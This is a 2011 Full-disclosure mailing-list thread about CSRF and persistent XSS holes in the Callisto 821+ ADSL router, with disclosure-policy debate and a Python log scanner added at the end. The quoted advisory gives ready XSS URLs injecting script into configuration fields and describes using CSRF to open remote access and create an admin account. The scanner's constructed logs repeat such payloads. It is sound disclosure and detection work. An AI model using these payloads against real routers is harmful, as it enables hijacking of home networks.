
Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+



Hello 0xd0!

> So, you could maybe have to think if the router has port 80 open and i assume 
> a remote-service

Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto 
821+) is open, but it's accessible only locally - from the local computer and 
LAN, not from the Internet (by default remote access is disabled). And all those 
hundreds of CSRF, XSS and DoS holes which I disclosed, without taking into 
account the "unlimited" XSS and DoS holes, allow bypassing this limitation of 
disallowed remote access and attacking the control panel remotely. In 
particular, it's possible via CSRF to enable remote access from the Internet to 
the control panel and then, by using the default login and password (or, if 
worried that the user changed it, by creating via CSRF a new user with a 
specified login and password), log into the control panel and take the router 
under control.

I wrote about such "unlimited" vulnerabilities in the article How to find 
billion of XSS vulnerabilities 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).

> Luckily some isp's do protect your modem, as many are so it seems, coded 
> weakly in the firmware area.

The developer of the modem already protected (as they thought) their consumers 
by disallowing access from the Internet by default. My ISP Ukrtelecom (already 
my ex-ISP) didn't change this setting and also thought it was enough to protect 
clients. After, at the beginning of April, I first entered the control panel 
and found that it was full of CSRF holes (in addition to the default login and 
password), I talked with Ukrtelecom's representative by phone.

And I asked him why their company didn't change the default login and password, 
didn't inform all their clients about the control panel, the login and password 
for the specific model of router (different models have differences, and no 
documentation on the routers was given to the clients) and the fact that the 
default login and password were used, and didn't recommend clients to change 
them. And they answered that because by default access from the Internet is 
disallowed, they thought that everything was secure, and their company (a 
hole-making one - with multiple holes on multiple of their web sites and in 
their Internet and telecommunication services, which I've informed them about 
for the last years) doesn't worry about their clients. And to my question about 
the multiple CSRF holes which can remotely change any settings of the modem, he 
didn't answer, because he doesn't know what it is. So attacks from local (from 
lamers or viruses on the local computer or LAN) and attacks from the Internet 
on a modem owner logged into the control panel are possible and are not 
considered a threat at all by the developer of the router and this ISP (a 
similar situation may exist with other ISPs).

> That is consumer value,and i assume the company has released a patch ?

No, the company (Iskra) completely ignored these issues (and there are hundreds 
of holes in their router). They ignored my first letter from the 26th of May as 
well as all other letters (24 letters in total during May - July about 
different vulnerabilities). Looks like they don't care about the security of 
their products and of their clients. Similarly to ISP Ukrtelecom, which is the 
distributor of Iskra's routers in Ukraine (possibly the only ISP which 
distributes these routers) and which also completely ignores the security of 
its own sites, services, the routers which they sell, and of their clients.

So all consumers of Iskra modems should know the truth - the real situation 
with the security of this company's routers. I made my decision (after all 
these holes in Ukrtelecom and Iskra and their ignoring of them) - I no longer 
use their services, nor their modems. Besides, Iskra is a funny company - of 
their official e-mails (mentioned on the site) service@ is not working at all, 
but e-marketing@ works, but they're not answering, not fixing, just ignoring, 
as I've already mentioned.

> why then disclose the thing, i guess you either go one way or the other, know 
> what i mean ?

No, I don't :-). But there are always reasons for disclosing vulnerabilities. 
And there are reasons in this particular case; they are obvious and mentioned 
in every post of mine about this router (besides worrying about the security of 
people, which is by default in all my disclosures).

> but yea, nice stuff if xss is your thing. ;')

All these hundreds of CSRF, XSS and DoS holes in this router are nice on their 
own. And yes, they were all found by me. All these holes in Callisto 821+ 
(http://securityvulns.ru/news/ZTE/Callisto/821.html) (of the 24 advisories, 
3APA3A forgot to put two from July, so they are not listed in this list - I've 
already reminded him two times, so he'd fix it).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
  ----- Original Message ----- 
  From: -= Glowing Sex =- 
  To: MustLive 
  Cc: full-disclosure@xxxxxxxxxxxxxxxxx 
  Sent: Saturday, July 30, 2011 1:42 AM
  Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+


  So... advanced...
  So, you could maybe have to think if the router has port 80 open and I assume 
  a remote service; most ISPs would have the port 80 remote-assist open for 
  possibly helping a customer. I know that is the first thing I switch to 'off', 
  and actually, my ISP went through that with me on install.
  Luckily some ISPs do protect your modem, as many are, so it seems, coded 
  weakly in the firmware area.

  That is consumer value, and I assume the company has released a patch? 
  Usually, you would either contact a vendor and completely see it through, as 
  in wait for their reply. I do not see this in the actual timeline; I only see 
  that you have said you're working 'with' them, and their CEO... why then 
  disclose the thing? I guess you either go one way or the other, know what I 
  mean?
  You should have a 2011-*-* - Vendor has now patched the issue regarding this, 
  and possibly, if it is serious, assigned a BID/CVE.
  I am only assuming what I see with other disclosure policies... but yea, nice 
  stuff if xss is your thing. ;')
  cheers
  0xd0




  On 30 July 2011 07:30, MustLive <mustlive@xxxxxxxxxxxxxxxxxx> wrote:

    Hello list!

    After a discussion with Michael Simpson about these vulnerabilities in
    Callisto 821+, I want to warn you about new multiple security
    vulnerabilities in the ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).

    These are Cross-Site Request Forgery and Cross-Site Scripting
    vulnerabilities. In April I already drew the attention of Ukrtelecom's
    representative (this modem was bought at Ukrtelecom) to multiple
    vulnerabilities in this model of Callisto modems (other models could also
    be affected).

    SecurityVulns ID: 11700.

    -------------------------
    Affected products:
    -------------------------

    The following model is vulnerable: SI2000 Callisto821+ Router: X7821 Annex A
    v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
    firmware, and also other models of Callisto, must also be vulnerable.

    ----------
    Details:
    ----------

    These attacks should be conducted on the modem owner, who is logged into the
    control panel. Taking into account that it's unlikely to catch him in this
    state, it's possible to use the before-mentioned vulnerabilities
    (http://websecurity.com.ua/5161/) for conducting a remote login (for
    logging him into the control panel). After that it's possible to conduct a
    CSRF or XSS attack.

    CSRF (WASC-09):

    Every connection in section LAN connections, the default one as well as the
    other connections, has advanced settings. Let's look at the example of the
    default connection (iplan).

    In section Edit connection, in subsection Edit Ip Interface
    (http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
    via CSRF it's possible to change the settings (IP, Mask and others) of the
    connection.

    In subsection Edit Tcp Mss Clamp
    (http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
    via CSRF it's possible to change the settings of the connection.

    In subsection Edit Rip Versions
    (http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
    via CSRF it's possible to change the settings of the connection.

    In subsection Edit NAT
    (http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
    via CSRF it's possible to change the settings of the connection.

    XSS (WASC-08):

    There are many persistent XSS vulnerabilities in the above-mentioned four
    subsections of section Edit connection.

    In subsection Edit Ip Interface:

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    In the subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
    situation is similar.

    Attacks via the names of parameters are also possible (when the XSS code is
    set in the name of a parameter), which I wrote about earlier
    (http://websecurity.com.ua/5277/).

    In this case the code will be executed immediately, and also when visiting
    the pages http://192.168.1.1/system/events.html and
    http://192.168.1.1/shared/event_log_selection.html.

    ------------
    Timeline:
    ------------

    2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
    which they give (sell) to their clients.
    2011.07.23 - disclosed at my site.
    2011.07.24 - informed developers (Iskratel).

    I mentioned these vulnerabilities on my site
    (http://websecurity.com.ua/5296/).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
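As an added defender-side example (not part of the advisory and not vendor code): a small access-log scanner for the two request shapes the quoted advisory describes against the router's edit-form endpoint, script markup in a query parameter's value or, as the advisory stresses, in its name, and a configuration request whose Referer is a site other than the router. The log lines, client addresses and lure site are constructed; the router address 192.168.1.1 is taken from the advisory.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Combined Log Format) from a router's
# embedded web server. Paths and parameter names mirror the advisory;
# client addresses, Referer values and the lure site are made up.
SAMPLE_LOG = """\
192.168.1.5 - - [23/Jul/2011:10:00:01 +0300] "GET /configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan HTTP/1.1" 200 2048 "http://192.168.1.1/configuration/" "Mozilla/5.0"
192.168.1.5 - - [23/Jul/2011:10:00:09 +0300] "GET /configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "http://lure.example/page.html" "Mozilla/5.0"
192.168.1.5 - - [23/Jul/2011:10:00:15 +0300] "GET /configuration/edit-form.html/edit?%3Cscript%3Ealert(1)%3C/script%3E=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.7 - - [23/Jul/2011:10:01:00 +0300] "GET /system/events.html HTTP/1.1" 200 4096 "http://192.168.1.1/status/" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"'
    r' (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')
# Markup that has no business in a configuration parameter name or value.
SCRIPT_RE = re.compile(r'<\s*/?\s*script|javascript:|\bon\w+\s*=', re.IGNORECASE)
CONFIG_PATH = "/configuration/edit-form.html"  # config-changing endpoint from the advisory
ROUTER_ORIGIN = "http://192.168.1.1/"          # assumed LAN address of the control panel

def analyse_line(line):
    """Return a list of (finding, detail) tuples for one log line; empty if benign."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line[:40])]
    findings = []
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes, so %3Cscript%3E is inspected as <script>.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Check the parameter *name* too: the advisory notes injected names are
        # reflected in the event log pages, so a value-only filter misses them.
        for what, text in (("name", name), ("value", value)):
            if SCRIPT_RE.search(text):
                findings.append((f"xss-in-{what}", text[:40]))
    if parts.path.startswith(CONFIG_PATH):
        ref = m.group("referer")
        # A config change driven from a page outside the router is the CSRF
        # shape described above; a missing Referer ("-") is not flagged.
        if ref != "-" and not ref.startswith(ROUTER_ORIGIN):
            findings.append(("csrf-offsite-referer", ref))
    return findings

def scan(log_text):
    """Map 1-based line number -> findings, keeping only lines with findings."""
    report = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = analyse_line(line)
        if hits:
            report[n] = hits
    return report
```

The Referer check is only an indicator: browsers and privacy extensions may strip it, so an absent header is neither proof of CSRF nor of a legitimate request.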